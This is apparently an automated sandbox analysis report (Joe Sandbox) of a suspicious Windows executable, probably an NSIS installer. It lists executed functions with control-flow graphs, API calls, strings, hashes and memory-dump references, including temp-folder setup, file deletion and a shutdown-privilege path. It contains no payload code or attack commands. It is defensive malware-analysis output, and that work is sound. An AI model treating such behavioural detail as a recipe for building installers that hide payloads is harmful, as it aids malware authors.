5711->5712

                                                      Executed Functions

                                                      Function 0040335A Relevance: 75.6, APIs: 27, Strings: 16, Instructions: 383stringfilecomCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 40335a-4033f2 #17 SetErrorMode OleInitialize call 4062b2 SHGetFileInfoW call 405f48 GetCommandLineW call 405f48 GetModuleHandleW 7 4033f4-4033f6 0->7 8 4033fb-40340f call 4059c0 CharNextW 0->8 7->8 11 40350a-403510 8->11 12 403414-40341a 11->12 13 403516 11->13 14 403423-40342a 12->14 15 40341c-403421 12->15 16 40352a-403544 GetTempPathW call 403326 13->16 18 403432-403436 14->18 19 40342c-403431 14->19 15->14 15->15 23 403546-403564 GetWindowsDirectoryW lstrcatW call 403326 16->23 24 40359c-4035b6 DeleteFileW call 402dbc 16->24 21 4034f7-403506 call 4059c0 18->21 22 40343c-403442 18->22 19->18 21->11 40 403508-403509 21->40 26 403444-40344b 22->26 27 40345c-403495 22->27 23->24 43 403566-403596 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403326 23->43 45 403667-403676 call 40382d OleUninitialize 24->45 46 4035bc-4035c2 24->46 33 403452 26->33 34 40344d-403450 26->34 28 4034b2-4034ec 27->28 29 403497-40349c 27->29 37 4034f4-4034f6 28->37 38 4034ee-4034f2 28->38 29->28 35 40349e-4034a6 29->35 33->27 34->27 34->33 41 4034a8-4034ab 35->41 42 4034ad 35->42 37->21 38->37 44 403518-403525 call 405f48 38->44 40->11 41->28 41->42 42->28 43->24 43->45 44->16 56 403772-403778 45->56 57 40367c-40368c call 405724 ExitProcess 45->57 49 403657-40365e call 40391f 46->49 50 4035c8-4035d3 call 4059c0 46->50 59 403663 49->59 63 403621-40362b 50->63 64 4035d5-40360a 50->64 61 403815-40381d 56->61 62 40377e-40379b call 4062b2 * 3 56->62 59->45 69 403823-403827 ExitProcess 61->69 70 40381f 61->70 92 4037e5-4037f3 call 4062b2 62->92 93 40379d-40379f 62->93 67 403692-4036ac lstrcatW lstrcmpiW 63->67 68 40362d-40363b call 405a9b 63->68 65 40360c-403610 64->65 73 403612-403617 65->73 74 403619-40361d 65->74 67->45 76 4036ae-4036c4 CreateDirectoryW SetCurrentDirectoryW 67->76 68->45 83 40363d-403653 call 405f48 * 2 68->83 70->69 73->74 78 40361f 73->78 74->65 74->78 80 4036d1-4036fa call 405f48 76->80 81 4036c6-4036cc call 405f48 76->81 78->63 91 4036ff-40371b call 405f6a DeleteFileW 80->91 81->80 83->49 101 40375c-403764 91->101 102 40371d-40372d CopyFileW 91->102 104 403801-40380c ExitWindowsEx 92->104 105 4037f5-4037ff 92->105 93->92 96 4037a1-4037a3 93->96 96->92 103 4037a5-4037b7 GetCurrentProcess 96->103 101->91 107 403766-40376d call 405de2 101->107 102->101 106 40372f-40374f call 405de2 call 405f6a call 4056c3 102->106 103->92 115 4037b9-4037db 103->115 104->61 109 40380e-403810 call 40140b 104->109 105->104 105->109 106->101 122 403751-403758 CloseHandle 106->122 107->45 109->61 115->92 122->101
                                                      APIs
                                                      • #17.COMCTL32 ref: 00403379
                                                      • SetErrorMode.KERNELBASE(00008001), ref: 00403384
                                                      • OleInitialize.OLE32(00000000), ref: 0040338B
                                                        • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                        • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                        • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 004033B3
                                                        • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 004033C8
                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000), ref: 004033DB
                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000020), ref: 00403403
                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,?), ref: 0040353B
                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB), ref: 0040354C
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 00403558
                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp), ref: 0040356C
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403574
                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low), ref: 00403585
                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\), ref: 0040358D
                                                      • DeleteFileW.KERNELBASE(1033), ref: 004035A1
                                                      • OleUninitialize.OLE32(?), ref: 0040366C
                                                      • ExitProcess.KERNEL32 ref: 0040368C
                                                      • lstrcatW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000,?), ref: 00403698
                                                      • lstrcmpiW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user~1\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\fTSt7dc60O.exe",00000000,?), ref: 004036A4
                                                      • CreateDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004036B0
                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\), ref: 004036B7
                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 00403711
                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\fTSt7dc60O.exe,0041FEA8,00000001), ref: 00403725
                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 00403752
                                                      • GetCurrentProcess.KERNEL32(00000028,00000006,00000006,00000005,00000004), ref: 004037AC
                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403804
                                                      • ExitProcess.KERNEL32 ref: 00403827
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$C:\Users\user\Desktop$C:\Users\user\Desktop\fTSt7dc60O.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                                                      • API String ID: 4107622049-2308846564
                                                      • Opcode ID: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                      • Instruction ID: 39938aed3c042d93969ea090ff24049052e59ae08dabad03a7e97e37c14ef613
                                                      • Opcode Fuzzy Hash: 4d4429256b2e22e1563bae374a615e4d58d6fbe71fb0bbfbec444303671cea11
                                                      • Instruction Fuzzy Hash: 8AC12670604311AAD720BF659C49A2B3EACEB8574AF10483FF480B62D2D77D9D41CB6E
                                                      Function 00405331 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 282windowclipboardmemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 123 405331-40534c 124 405352-40541b GetDlgItem * 3 call 4041cf call 404a8f GetClientRect GetSystemMetrics SendMessageW * 2 123->124 125 4054dd-4054e4 123->125 146 405439-40543c 124->146 147 40541d-405437 SendMessageW * 2 124->147 127 4054e6-405508 GetDlgItem CreateThread CloseHandle 125->127 128 40550e-40551b 125->128 127->128 130 405539-405543 128->130 131 40551d-405523 128->131 135 405545-40554b 130->135 136 405599-40559d 130->136 133 405525-405534 ShowWindow * 2 call 4041cf 131->133 134 40555e-405567 call 404201 131->134 133->130 143 40556c-405570 134->143 141 405573-405583 ShowWindow 135->141 142 40554d-405559 call 404173 135->142 136->134 139 40559f-4055a5 136->139 139->134 148 4055a7-4055ba SendMessageW 139->148 144 405593-405594 call 404173 141->144 145 405585-40558e call 4051f2 141->145 142->134 144->136 145->144 152 40544c-405463 call 40419a 146->152 153 40543e-40544a SendMessageW 146->153 147->146 154 4055c0-4055eb CreatePopupMenu call 405f6a AppendMenuW 148->154 155 4056bc-4056be 148->155 162 405465-405479 ShowWindow 152->162 163 405499-4054ba GetDlgItem SendMessageW 152->163 153->152 160 405600-405615 TrackPopupMenu 154->160 161 4055ed-4055fd GetWindowRect 154->161 155->143 160->155 164 40561b-405632 160->164 161->160 165 405488 162->165 166 40547b-405486 ShowWindow 162->166 163->155 167 4054c0-4054d8 SendMessageW * 2 163->167 168 405637-405652 SendMessageW 164->168 169 40548e-405494 call 4041cf 165->169 166->169 167->155 168->168 170 405654-405677 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 168->170 169->163 172 405679-4056a0 SendMessageW 170->172 172->172 173 4056a2-4056b6 GlobalUnlock SetClipboardData CloseClipboard 172->173 173->155
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000403), ref: 00405390
                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040539F
                                                      • GetClientRect.USER32(?,?), ref: 004053DC
                                                      • GetSystemMetrics.USER32(00000015), ref: 004053E4
                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 00405405
                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405416
                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405429
                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405437
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040544A
                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040546C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405480
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054A1
                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004054B1
                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004054CA
                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004054D6
                                                      • GetDlgItem.USER32(?,000003F8), ref: 004053AE
                                                        • Part of subcall function 004041CF: SendMessageW.USER32(00000028,?,00000001,00403FFB), ref: 004041DD
                                                      • GetDlgItem.USER32(?,000003EC), ref: 004054F3
                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_000052C5,00000000), ref: 00405501
                                                      • CloseHandle.KERNELBASE(00000000), ref: 00405508
                                                      • ShowWindow.USER32(00000000), ref: 0040552C
                                                      • ShowWindow.USER32(?,00000008), ref: 00405531
                                                      • ShowWindow.USER32(00000008), ref: 0040557B
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055AF
                                                      • CreatePopupMenu.USER32 ref: 004055C0
                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004055D4
                                                      • GetWindowRect.USER32(?,?), ref: 004055F4
                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040560D
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                      • OpenClipboard.USER32(00000000), ref: 00405655
                                                      • EmptyClipboard.USER32 ref: 0040565B
                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405667
                                                      • GlobalLock.KERNEL32(00000000), ref: 00405671
                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405685
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004056A5
                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 004056B0
                                                      • CloseClipboard.USER32 ref: 004056B6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                      • String ID: {$&B
                                                      • API String ID: 590372296-2518801558
                                                      • Opcode ID: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                      • Instruction ID: 6f8bb207ab4459f732b66fbe2fdab1c380fd8c459621fe3193bce92f33b6cf64
                                                      • Opcode Fuzzy Hash: 7775d457d8fde2865fa6d0874cf326612850ae095f4a8d1cd8ac1be61ac30762
                                                      • Instruction Fuzzy Hash: ECB14A70900208FFDB119F60DD89AAE7B79FB04354F40817AFA05BA1A0C7759E52DF69
                                                      Function 00405F6A Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 419 405f6a-405f75 420 405f77-405f86 419->420 421 405f88-405f9e 419->421 420->421 422 405fa4-405fb1 421->422 423 4061b6-4061bc 421->423 422->423 424 405fb7-405fbe 422->424 425 4061c2-4061cd 423->425 426 405fc3-405fd0 423->426 424->423 428 4061d8-4061d9 425->428 429 4061cf-4061d3 call 405f48 425->429 426->425 427 405fd6-405fe2 426->427 430 4061a3 427->430 431 405fe8-406024 427->431 429->428 433 4061b1-4061b4 430->433 434 4061a5-4061af 430->434 435 406144-406148 431->435 436 40602a-406035 GetVersion 431->436 433->423 434->423 439 40614a-40614e 435->439 440 40617d-406181 435->440 437 406037-40603b 436->437 438 40604f 436->438 437->438 443 40603d-406041 437->443 446 406056-40605d 438->446 444 406150-40615c call 405e8f 439->444 445 40615e-40616b call 405f48 439->445 441 406190-4061a1 lstrlenW 440->441 442 406183-40618b call 405f6a 440->442 441->423 442->441 443->438 448 406043-406047 443->448 457 406170-406179 444->457 445->457 450 406062-406064 446->450 451 40605f-406061 446->451 448->438 453 406049-40604d 448->453 455 4060a0-4060a3 450->455 456 406066-406083 call 405e15 450->456 451->450 453->446 460 4060b3-4060b6 455->460 461 4060a5-4060b1 GetSystemDirectoryW 455->461 462 406088-40608c 456->462 457->441 459 40617b 457->459 463 40613c-406142 call 4061dc 459->463 465 406121-406123 460->465 466 4060b8-4060c6 GetWindowsDirectoryW 460->466 464 406125-406129 461->464 467 406092-40609b call 405f6a 462->467 468 40612b-40612f 462->468 463->441 464->463 464->468 465->464 469 4060c8-4060d2 465->469 466->465 467->464 468->463 472 406131-406137 lstrcatW 468->472 474 4060d4-4060d7 469->474 475 4060ec-406102 SHGetSpecialFolderLocation 469->475 472->463 474->475 477 4060d9-4060e0 474->477 478 406104-40611b SHGetPathFromIDListW CoTaskMemFree 475->478 479 40611d 475->479 480 4060e8-4060ea 477->480 478->464 478->479 479->465 480->464 480->475
                                                      APIs
                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 0040602D
                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004060AB
                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004060BE
                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004060FA
                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406108
                                                      • CoTaskMemFree.OLE32(?), ref: 00406113
                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406137
                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,?,00405229,Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,00000000,00000000), ref: 00406191
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                      • String ID: Call$Skipped: C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                      • API String ID: 900638850-1737829468
                                                      • Opcode ID: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                      • Instruction ID: 5a47950f0b5222037037379568de6f858daa6aaa62ae53bcd4b1bc7075dc7fd7
                                                      • Opcode Fuzzy Hash: 1bceb9c34b05b27e3618ed90a195e6464c3aae8e072edacfa9e3722d3d9acc23
                                                      • Instruction Fuzzy Hash: DE611571A00105ABDF209F24CC40AAF37A5EF55314F52C13BE956BA2E1D73D4AA2CB5E
                                                      Function 004057D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 481 4057d0-4057f6 call 405a9b 484 4057f8-40580a DeleteFileW 481->484 485 40580f-405816 481->485 486 40598c-405990 484->486 487 405818-40581a 485->487 488 405829-405839 call 405f48 485->488 489 405820-405823 487->489 490 40593a-40593f 487->490 494 405848-405849 call 4059df 488->494 495 40583b-405846 lstrcatW 488->495 489->488 489->490 490->486 493 405941-405944 490->493 496 405946-40594c 493->496 497 40594e-405956 call 40628b 493->497 498 40584e-405852 494->498 495->498 496->486 497->486 505 405958-40596c call 405993 call 405788 497->505 501 405854-40585c 498->501 502 40585e-405864 lstrcatW 498->502 501->502 504 405869-405885 lstrlenW FindFirstFileW 501->504 502->504 507 40588b-405893 504->507 508 40592f-405933 504->508 521 405984-405987 call 4051f2 505->521 522 40596e-405971 505->522 511 4058b3-4058c7 call 405f48 507->511 512 405895-40589d 507->512 508->490 510 405935 508->510 510->490 523 4058c9-4058d1 511->523 524 4058de-4058e9 call 405788 511->524 513 405912-405922 FindNextFileW 512->513 514 40589f-4058a7 512->514 513->507 520 405928-405929 FindClose 513->520 514->511 517 4058a9-4058b1 514->517 517->511 517->513 520->508 521->486 522->496 525 405973-405982 call 4051f2 call 405de2 522->525 523->513 526 4058d3-4058dc call 4057d0 523->526 534 40590a-40590d call 4051f2 524->534 535 4058eb-4058ee 524->535 525->486 526->513 534->513 538 4058f0-405900 call 4051f2 call 405de2 535->538 539 405902-405908 535->539 538->513 539->513
                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 004057F9
                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405841
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 00405864
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 0040586A
                                                      • FindFirstFileW.KERNELBASE(004246F0,?,?,?,00409014,?,004246F0,?,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0,"C:\Users\user\Desktop\fTSt7dc60O.exe"), ref: 0040587A
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 0040591A
                                                      • FindClose.KERNEL32(00000000), ref: 00405929
                                                      Strings
                                                      • "C:\Users\user\Desktop\fTSt7dc60O.exe", xrefs: 004057D9
                                                      • \*.*, xrefs: 0040583B
                                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004057DE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                      • API String ID: 2035342205-1766276416
                                                      • Opcode ID: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                      • Instruction ID: 2292a97837c012d07e09995a86319137dd3f2048718c0aa8a22e23afcdeedbd0
                                                      • Opcode Fuzzy Hash: 42d14f137d7c51639dd5450d77468bfd9c1695374b56492c5285f64ee032ed7a
                                                      • Instruction Fuzzy Hash: BF41C171800914EACF217B668C49BBF7678EB81328F24817BF811761D1D77C4E829E6E
                                                      Function 0040659D Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction ID: 2d3234ddcc30eb1b928d1b3f6e05ca322d860fc2e9c12c5c13e3e91ce8371178
                                                      • Opcode Fuzzy Hash: a31c6952aff2c2d9e3077db5cda77fcb20a4fa1314c68fe29834e6b9dbef6b62
                                                      • Instruction Fuzzy Hash: 74F17571D04229CBCF28CFA8C8946ADBBB1FF44305F25856ED456BB281D3785A96CF44
                                                      Function 0040628B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00425738,00424EF0,00405AE4,00424EF0,00424EF0,00000000,00424EF0,00424EF0,?,?,771B2EE0,004057F0,?,C:\Users\user~1\AppData\Local\Temp\,771B2EE0), ref: 00406296
                                                      • FindClose.KERNEL32(00000000), ref: 004062A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID: 8WB
                                                      • API String ID: 2295610775-3088156181
